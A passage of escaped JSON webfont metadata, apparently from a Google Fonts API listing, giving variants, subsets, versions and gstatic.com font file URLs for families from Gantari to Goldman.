\"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g3HPT3wa5GD2qnm.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g2gPT3wa5GD2qnm.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g2JPT3wa5GD2qnm.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoedWyYZWh37nmpWc.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeVWzYZWh37nmpWc.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeYuzYZWh37nmpWc.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoedWzYZWh37nmpWc.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeeezYZWh37nmpWc.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeQu0YZWh37nmpWc.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeTK0YZWh37nmpWc.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeVW0YZWh37nmpWc.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeXy0YZWh37nmpWc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gayathri\",\n      \"variants\": [\n        \"100\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"malayalam\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/gayathri/v15/MCoWzAb429DbBilWLLhc-pvSA_gA2W8.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/gayathri/v15/MCoQzAb429DbBilWLIA48J_wBugA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gayathri/v15/MCoXzAb429DbBilWLLiE37v4LfQJwHbn.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gelasio\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gelasio/v10/cIf9MaFfvUQxTTqSxCmrYGkHgIs.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/gelasio/v10/cIf_MaFfvUQxTTqS9CuhZEsCkIt9QQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/gelasio/v10/cIf4MaFfvUQxTTqS_N2CRGEsnIJkWL4.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/gelasio/v10/cIf6MaFfvUQxTTqS9CuZkGImmKBhSL7Y1Q.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/gelasio/v10/cIf4MaFfvUQxTTqS_PGFRGEsnIJkWL4.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/gelasio/v10/cIf6MaFfvUQxTTqS9CuZvGUmmKBhSL7Y1Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gelasio/v10/cIf4MaFfvUQxTTqS_JWERGEsnIJkWL4.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/gelasio/v10/cIf6MaFfvUQxTTqS9CuZ2GQmmKBhSL7Y1Q.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gemunu Libre\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"sinhala\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp05iJPvSLeMXPIWA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp00aJPvSLeMXPIWA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp0xiJPvSLeMXPIWA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp0yqJPvSLeMXPIWA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp08aOPvSLeMXPIWA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp0_-OPvSLeMXPIWA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp05iOPvSLeMXPIWA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Genos\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cherokee\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVqknorUK6K7ZsAg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVKkjorUK6K7ZsAg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwV9EjorUK6K7ZsAg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVqkjorUK6K7ZsAg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVmEjorUK6K7ZsAg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVdE_orUK6K7ZsAg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVTU_orUK6K7ZsAg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVKk_orUK6K7ZsAg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVA0_orUK6K7ZsAg.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgsA70i-CbN8Ard7.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYguA7ki-CbN8Ard7.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgte7ki-CbN8Ard7.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgsA7ki-CbN8Ard7.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgsy7ki-CbN8Ard7.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgve6Ui-CbN8Ard7.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgvn6Ui-CbN8Ard7.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYguA6Ui-CbN8Ard7.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgup6Ui-CbN8Ard7.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gentium Book Basic\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gentiumbookbasic/v16/pe0zMJCbPYBVokB1LHA9bbyaQb8ZGjcIV7t7w6bE2A.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/gentiumbookbasic/v16/pe0xMJCbPYBVokB1LHA9bbyaQb8ZGjc4VbF_4aPU2Ec9.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gentiumbookbasic/v16/pe0wMJCbPYBVokB1LHA9bbyaQb8ZGjcw65Rfy43Y0V4kvg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/gentiumbookbasic/v16/pe0-MJCbPYBVokB1LHA9bbyaQb8ZGjc4VYnDzofc81s0voO3.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gentium Book Plus\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gentiumbookplus/v1/vEFL2-RHBgUK5fbjKxRpbBtJPyRpofKfdbLOrdPV.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/gentiumbookplus/v1/vEFN2-RHBgUK5fbjKxRpbBtJPyRpocKdf7bsqMPVZb4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gentiumbookplus/v1/vEFO2-RHBgUK5fbjKxRpbBtJPyRpocojWpbGhs_cfKe1.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/gentiumbookplus/v1/vEFA2-RHBgUK5fbjKxRpbBtJPyRpocKdRwrDjMv-ebe1Els.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gentium Plus\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gentiumplus/v1/Iurd6Ytw-oSPaZ00r2bNe8VpjJtM6G0t9w.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/gentiumplus/v1/IurD6Ytw-oSPaZ00r2bNe8VZjpFIymg9957e.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gentiumplus/v1/IurC6Ytw-oSPaZ00r2bNe8VRMLRo4EYx_ofHsw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/gentiumplus/v1/IurA6Ytw-oSPaZ00r2bNe8VZjqn05Uw13ILXs-h6.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Geo\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/geo/v19/CSRz4zRZlufVL3BmQjlCbQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/geo/v19/CSRx4zRZluflLXpiYDxSbf8r.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Georama\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5GvktmQsL5_tgbg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5mvgtmQsL5_tgbg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5RPgtmQsL5_tgbg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5GvgtmQsL5_tgbg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5KPgtmQsL5_tgbg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5xP8tmQsL5_tgbg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5_f8tmQsL5_tgbg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5mv8tmQsL5_tgbg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5s_8tmQsL5_tgbg.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rvF2wEPxf5wbh3T.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rtF2gEPxf5wbh3T.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rub2gEPxf5wbh3T.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rvF2gEPxf5wbh3T.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rv32gEPxf5wbh3T.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rsb3QEPxf5wbh3T.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rsi3QEPxf5wbh3T.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rtF3QEPxf5wbh3T.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rts3QEPxf5wbh3T.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Geostar\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/geostar/v22/sykz-yx4n701VLOftSq9-trEvlQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Geostar Fill\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/geostarfill/v22/AMOWz4SWuWiXFfjEohxQ9os0U1K2w9lb4g.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Germania One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/germaniaone/v20/Fh4yPjrqIyv2ucM2qzBjeS3ezAJONau6ew.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gideon Roman\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gideonroman/v7/e3tmeuGrVOys8sxzZgWlmXoge0PWovdU4w.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gidugu\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gidugu/v21/L0x8DFMkk1Uf6w3RvPCmRSlUig.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gilda Display\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gildadisplay/v13/t5tmIRoYMoaYG0WEOh7HwMeR7TnFrpOHYh4.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Girassol\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/girassol/v16/JTUUjIo_-DK48laaNC9Nz2pJzxbi.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Give You Glory\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/giveyouglory/v15/8QIQdiHOgt3vv4LR7ahjw9-XYc1zB4ZD6rwa.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Glass Antiqua\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/glassantiqua/v20/xfu30Wr0Wn3NOQM2piC0uXOjnL_wN6fRUkY.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Glegoo\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/glegoo/v14/_Xmt-HQyrTKWaw2Ji6mZAI91xw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/glegoo/v14/_Xmu-HQyrTKWaw2xN4a9CKRpzimMsg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gloria Hallelujah\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gloriahallelujah/v17/LYjYdHv3kUk9BMV96EIswT9DIbW-MLSy3TKEvkCF.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Glory\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQwIiDpn-dDi9EOQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQQImDpn-dDi9EOQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQnomDpn-dDi9EOQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQwImDpn-dDi9EOQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQ8omDpn-dDi9EOQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQHo6Dpn-dDi9EOQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQJ46Dpn-dDi9EOQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/glory/v9/q5uasoi9Lf1w5t3Est24nq9blIRQQI6Dpn-dDi9EOQ.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMpr5HWZLCpUOaM6.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMrr5XWZLCpUOaM6.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMo15XWZLCpUOaM6.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMpr5XWZLCpUOaM6.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMpZ5XWZLCpUOaM6.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMq14nWZLCpUOaM6.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMqM4nWZLCpUOaM6.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/glory/v9/q5uYsoi9Lf1w5vfNgCJg98TBOoNFCMrr4nWZLCpUOaM6.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gluten\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Vb7B1Luni7ciJh.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Xb7R1Luni7ciJh.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8UF7R1Luni7ciJh.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Vb7R1Luni7ciJh.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Vp7R1Luni7ciJh.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8WF6h1Luni7ciJh.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8W86h1Luni7ciJh.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Xb6h1Luni7ciJh.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/gluten/v9/Hhy_U5gk9fW7OUdVIPh2zD_RSqQJ__A15jgJsn-Bhb_yI8Xy6h1Luni7ciJh.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Goblin One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/goblinone/v22/CSR64z1ZnOqZRjRCBVY_TOcATNt_pOU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Gochi Hand\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/gochihand/v19/hES06XlsOjtJsgCkx1PkTo71-n0nXWA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Goldman\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      